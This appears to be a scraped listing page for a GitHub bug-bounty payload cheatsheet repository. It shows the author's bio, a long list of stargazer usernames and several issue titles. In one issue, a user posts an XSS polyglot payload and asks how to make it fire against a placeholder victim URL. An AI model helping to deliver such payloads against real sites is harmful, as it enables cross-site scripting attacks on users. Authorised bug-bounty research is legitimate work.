edoverflow / bugbounty-cheatsheet Goto Github PK

A list of interesting payloads, tips and tricks for bug bounty hunters.

License: Creative Commons Attribution Share Alike 4.0 International

security payloads infosec bugbounty

bugbounty-cheatsheet's Introduction

Hi 👋

I am a web designer, developer, security researcher, and have experience triaging for numerous vulnerability disclosure programmes.

In 2016, I joined Gratipay’s Blue Team where I operated their bug bounty programme. Subsequently, in 2018, I joined HackerOne as a Security Analyst. While at HackerOne, I had the privilege of triaging in-person alongside organisations such as GitHub, Salesforce, and the United States Marine Corps.

Currently, I am a Senior Pentester at Cure53, where I use my expertise to help clients strengthen their security posture by conducting security audits and source code reviews.

Outside of work, I enjoy staying active and maintaining a strong dedication to swimming, honed during my time as a student on the University of Warwick’s Sports Scholarship programme.

edoverflow.com • LinkedIn

bugbounty-cheatsheet's People

Contributors

Stargazers

Watchers

Forkers

buffer0x7cd pareshparmar blacknight-rh jineeshak kobs0n thez3r0 hax0rg1rl toecuta gub0x1 kbahaxor tipsyhacker 0patch greycel magnologan panckazzz sbehrens hackmycontrolsystem sonahri nassz ladyleet1337 sbzo toekhaing d1pakda5 totoroha yasins neutrinoguy 0x13337 wha000tif briansandro subc0ol tuian nuadaandre r00tuser111 kudo28 jamesfebin antichown nvzard x1mdev xiaoyinl monkeysm8 robinl1 pentestingtools walexzzy vulmoss olivierh59500 wuyasec h121h balabala2 nullsxcurity streaak ng-arunkumar socmap secsecsec aln7 bluebear171 douxiansheng security-prince tobey123 long80a jojinkb qsdj andyvaikunth proabiral term1n80r rojan-rijal poor-cmd gloxec h3ll0w0lrd botranvan li4ng lwwwzh caoyunzhu angeloobeta xee5ch its-kangara kunwaratulhax0r avgirl devclev drag0nren 0x676f64 ssteo reke592 xingkong123600 sunu11 nycto-hackerone vngkv123 warlock0007 tarzand aabcde deepamkanjani aurimusblack zenosxx doglife007 0thm4n3 bellcjt murthysagi iamr0b0t zerod4y codedevloper sathishdsgithub

bugbounty-cheatsheet's Issues

help me please!

hello bro... i need help... i did look your document... i did find xss exploit in your documents..

jaVasCript:/-//*\/'/"/**/(/* */oNcliCk=alert("this is test") )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

i am using chrome. i am write this exploit in chrome developer , i can see xss alert...

How do I run this url in the url without the chrome developer ??

victim url : https://www.xxx.xxx/xxx/some.js (How can I place xss exploit in this URL?)

I do it this way but xss doesn't give warning message :

https://www.xxx.xxx/xxx/some.js?jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert("this is test") )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

https://www.xxx.xxx/xxx/some.js#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert("this is test") )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

https://www.xxx.xxx/xxx/some.js/jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert("this is test") )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

please help me... this is very important for me

edoverflow / bugbounty-cheatsheet Goto Github PK

bugbounty-cheatsheet's Introduction

bugbounty-cheatsheet's People

Contributors

Stargazers

Watchers

Forkers

bugbounty-cheatsheet's Issues

help me please!

Typo in line 3 of README

Bug hunting

Adding AngularJS template injection (sandbox bypasses)

this link is no more worked, their domain name is expired http://www.evilsql.com/main/index.php

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent